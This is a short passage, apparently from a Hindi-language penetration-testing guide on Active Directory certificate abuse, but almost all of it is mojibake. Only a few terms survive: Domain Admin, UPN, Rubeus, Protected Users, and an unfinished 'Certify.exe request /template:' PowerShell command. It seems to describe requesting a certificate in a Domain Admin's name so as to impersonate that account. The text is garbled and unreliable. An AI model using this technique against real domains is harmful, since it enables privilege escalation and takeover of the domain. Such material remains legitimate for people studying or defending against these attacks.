рдпрд╣ рдПрдХреНрд╕рдкреНрд▓реЙрдЗрдЯ рдХреЗрд╡рд▓ рдЗрд╕рд▓рд┐рдП рдХрд╛рдо рдХрд░рддрд╛ рд╣реИ рдХреНрдпреЛрдВрдХрд┐ рдпреЗ рд╕реЗрдЯрд┐рдВрдЧреНрд╕ рд╕рд░реНрд╡рд░/рдХреНрд▓рд╛рдЗрдВрдЯ рдкреНрд░рдорд╛рдгреАрдХрд░рдг рд╕рдХреНрд╖рдо рдХрд░рддреА рд╣реИрдВ, рдЬрд┐рд╕рдХрд╛ рдЕрд░реНрде рд╣реИ рдХрд┐ рдПрдХ рд╣рдорд▓рд╛рд╡рд░ Domain Admin ("DA") рдХрд╛ UPN рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдХрд░ рд╕рдХрддрд╛ рд╣реИ рдФрд░ рдкреНрд░рд╛рдкреНрдд рдкреНрд░рдорд╛рдгрдкрддреНрд░ рдХрд╛ рдЙрдкрдпреЛрдЧ Rubeus рдХреЗ рд╕рд╛рде рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдЬрд╛рд▓реА рдмрдирд╛рдиреЗ рдХреЗ рд▓рд┐рдП рдХрд░ рд╕рдХрддрд╛ рд╣реИред
_рдиреЛрдЯ: рдпрджрд┐ рдХреЛрдИ Domain Admin Protected Users рд╕рдореВрд╣ рдореЗрдВ рд╣реИ, рддреЛ рдПрдХреНрд╕рдкреНрд▓реЙрдЗрдЯ рдЗрдЪреНрдЫрд╛рдиреБрд╕рд╛рд░ рдХрд╛рдо рдирд╣реАрдВ рдХрд░ рд╕рдХрддрд╛ рд╣реИред рд▓рдХреНрд╖реНрдп рдХреЗ рд▓рд┐рдП DA рдЪреБрдирдиреЗ рд╕реЗ рдкрд╣рд▓реЗ рдЬрд╛рдБрдЪ рдХрд░реЗрдВред_
Certify рдХреЗ рд╕рд╛рде DA рдХреЗ рдЦрд╛рддрд╛ рдкреНрд░рдорд╛рдгрдкрддреНрд░ рдХрд╛ рдЕрдиреБрд░реЛрдз рдХрд░реЗрдВ```powershell .\Certify.exe request /template: